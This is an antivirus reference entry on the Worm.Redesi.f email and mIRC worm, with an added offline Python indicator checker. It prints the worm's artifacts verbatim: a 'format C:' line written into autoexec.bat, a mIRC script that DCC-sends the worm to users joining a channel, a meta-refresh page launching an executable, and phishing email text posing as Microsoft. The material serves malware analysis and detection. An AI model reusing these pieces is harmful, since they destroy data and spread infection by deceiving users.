Worm.Redesi.f

Worm.Redesi.f is a computer virus: a worm that spreads via e-mail and mIRC. When it triggers it pops up a message box claiming that a Windows update has succeeded in order to deceive the user, drops five copies of itself into the root of the C: drive, and adds a startup entry to the registry so that it runs automatically at boot.

Overview

Aliases: I-Worm.Redesi.f [AVP], I-Worm/Redesi.f [KV], Worm.Redesi.f [RS]
Handled on:
Threat level: ★★
Chinese name: 紅絲帶變種F (Red Ribbon variant F)
Virus type: Worm
Affected systems: Win9x / WinNT

Virus behaviour:

This is a worm that spreads via e-mail and mIRC. When it triggers it pops up a message box claiming that a Windows update has succeeded in order to deceive the user, drops five copies of itself into the root of the C: drive, and adds a startup entry to the registry so that it runs automatically at boot. The virus also writes two batch commands into C:\autoexec.bat: one displays "With a fool no season spend, or be counted as his freind.", the other formats the C: drive. By modifying mIRC's script configuration file it ties mIRC to the virus file, adding a second propagation channel. It also generates an HTML file, C:\inetpub\wwwroot\default.htm; when a user opens that page, the virus file is launched. The virus harvests e-mail addresses from the Outlook Express address book and mails itself out as an attachment in Microsoft's name. The message is highly deceptive, so users are likely to be fooled into opening the attachment and becoming infected.
1) Creates several copies of the virus in the root of the C: drive (all as hidden files):
C:\Commond.exe
C:\MAPI.exe
C:\Sysupdate.exe
C:\UserConfig.exe
C:\disksync.exe
2) Adds a startup entry to the registry so that the virus runs at boot:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"Desire"="C:\commond.exe"
Under HKEY_LOCAL_MACHINE\Software\Microsoft it adds the value:
"Desire"="Done"
3) Writes the following to C:\autoexec.bat:
ECHO With a fool no season spend, or be counted as his freind.
format C: /autotest
4) Writes the following to C:\mirc\script.ini:
[script]
n0= on 1:JOIN:#:{
n1= .msg $nick Dear User. Please apply this patch that will protect you from UDP flooding. If you are running a Linux IRC client this update is not needed due to kernel filtering. Regards. Dalnet / Undernet staff.
n2= .copy C:\MAPI.exe C:\mirc\IRCUpdate.IRC.pif
n3= .dcc send $nick C:\mirc\IRCUpdate.IRC.pif
n4= }
5) Creates the file:
C:\inetpub\wwwroot\web.exe
and generates a web page that points to it:
C:\inetpub\wwwroot\default.htm
The content of that page is as follows (the HTML tags, lost in extraction, are restored):
<META http-equiv="refresh" content="0; url=Web.exe">
<A href="./Web.exe">
<h3>
We Are Forever
</h3>
</A>
6) Uses one of the following lines as the e-mail subject:
FW: Windows at Risk.
FW: Buffer overflow could cause IT meltdown.
FW: Insufficient bounds chcecking cause buffer over run.
FW: Executable stack could cost IT sector millions.
FW: Invalid instruction causes AX and BX registers to differ.
FW: Terrorists release computer virus.
FW: Microsoft and C.E.R.T Corobaration
FW: Stack overrun can cause data loss on first bootable disk
FW: Microsoft Update. Final Release Candidate.
FW: Redesi worm. MAPI update..
7) E-mail body:
Hey. Sorry I've not emailed you for a while ... well I am now.
Just letting you know I'll be sending an attachment in my next email,so you don't have to worry. I know you can't be too carefull with these virii around, but this is OK.
Speak to you later.
Hey
Well, here is the email I told you I was going to send.
I'll speak to you more later. The boss is comming.
-----Original Message-----
From: Microsoft Security List [mailto:[email protected]]
Sent: 25 October 2001 12:03
Subject: Buffer overflow
Dear Subscriber
Due to insufficient bounds checking in the Windows Messaging API
any value stores in the AX and BX registers(and their register halves
any XOR (compare) operation against these to registers or the h and l register halfs
will always return and value of 1, causing the JNE instruction to execute.
We consider this a HIGH RISK vulnerability,and any computer hacker having any
knowledge of the assembly language could write a working egg to exploit this flaw.
It is highly advised that you install the attached MAPI update to stop any subsequent security breach.
Regards
Microsoft Support
8) Uses one of the following names as the attachment file name:
Commond.exe
MAPI.exe
Sysupdate.exe
UserConfig.exe
disksync.exe
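As an added example (not part of this entry or of any antivirus vendor's code), the following Python script checks constructed copies of the artifacts listed above for the worm's indicators: the "format C: /autotest" line in autoexec.bat, the JOIN-triggered DCC send in script.ini, the meta-refresh to Web.exe in default.htm, the "Desire" Run value, and the five dropped file names. The inputs are supplied as strings and dicts so it runs offline; the indicator names and the SAMPLE dict are the author's own constructions.

```python
import re

# Indicators taken from the entry above; all matching is case-insensitive.
DROPPED_FILES = {"commond.exe", "mapi.exe", "sysupdate.exe", "userconfig.exe", "disksync.exe"}
RUN_VALUE_NAME, RUN_VALUE_DATA = "Desire", r"c:\commond.exe"

def check_autoexec(text):
    """True if autoexec.bat carries the worm's destructive 'format C: /autotest' line."""
    return any(re.match(r"\s*format\s+c:\s*/autotest", ln, re.I) for ln in text.splitlines())

def check_mirc_script(text):
    """True if script.ini hooks channel JOIN and DCC-sends a .pif to the joining nick."""
    low = text.lower()
    return "on 1:join:#:" in low and re.search(r"\.dcc\s+send\s+\$nick\s+\S+\.pif", low) is not None

def check_default_htm(text):
    """True if default.htm meta-refreshes straight into Web.exe."""
    return re.search(r'http-equiv="refresh"[^>]*url=web\.exe', text, re.I) is not None

def check_run_key(run_values):
    """run_values maps value names under the Run key to their data (a constructed dict, not a live read)."""
    data = run_values.get(RUN_VALUE_NAME)
    return data is not None and data.lower() == RUN_VALUE_DATA

def dropped_files_present(root_names):
    """Names from a C: root directory listing that match the worm's hidden copies."""
    return sorted(n for n in root_names if n.lower() in DROPPED_FILES)

def scan(artifacts):
    """Return the names of the indicators hit; artifacts is a dict holding the five inputs above."""
    checks = (
        ("autoexec_format", check_autoexec(artifacts.get("autoexec", ""))),
        ("mirc_dcc_hook", check_mirc_script(artifacts.get("script_ini", ""))),
        ("default_htm_redirect", check_default_htm(artifacts.get("default_htm", ""))),
        ("run_key_desire", check_run_key(artifacts.get("run_values", {}))),
        ("dropped_copies", bool(dropped_files_present(artifacts.get("root_files", [])))),
    )
    return [name for name, hit in checks if hit]

# Constructed sample input reproducing what the entry says the worm writes to disk.
SAMPLE = {
    "autoexec": "ECHO With a fool no season spend, or be counted as his freind.\nformat C: /autotest\n",
    "script_ini": "[script]\nn0= on 1:JOIN:#:{\nn1= .msg $nick Dear User.\nn2= .copy C:\\MAPI.exe "
                  "C:\\mirc\\IRCUpdate.IRC.pif\nn3= .dcc send $nick C:\\mirc\\IRCUpdate.IRC.pif\nn4= }\n",
    "default_htm": '<META http-equiv="refresh" content="0; url=Web.exe">\n<A href="./Web.exe"><h3>We Are Forever</h3></A>',
    "run_values": {"Desire": r"C:\commond.exe"},
    "root_files": ["boot.ini", "Commond.exe", "MAPI.exe", "Sysupdate.exe", "UserConfig.exe", "disksync.exe"],
}
```

Calling scan(SAMPLE) returns all five indicator names; on a real host the same checks would be fed the contents of the files and the Run key read by your own tooling.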
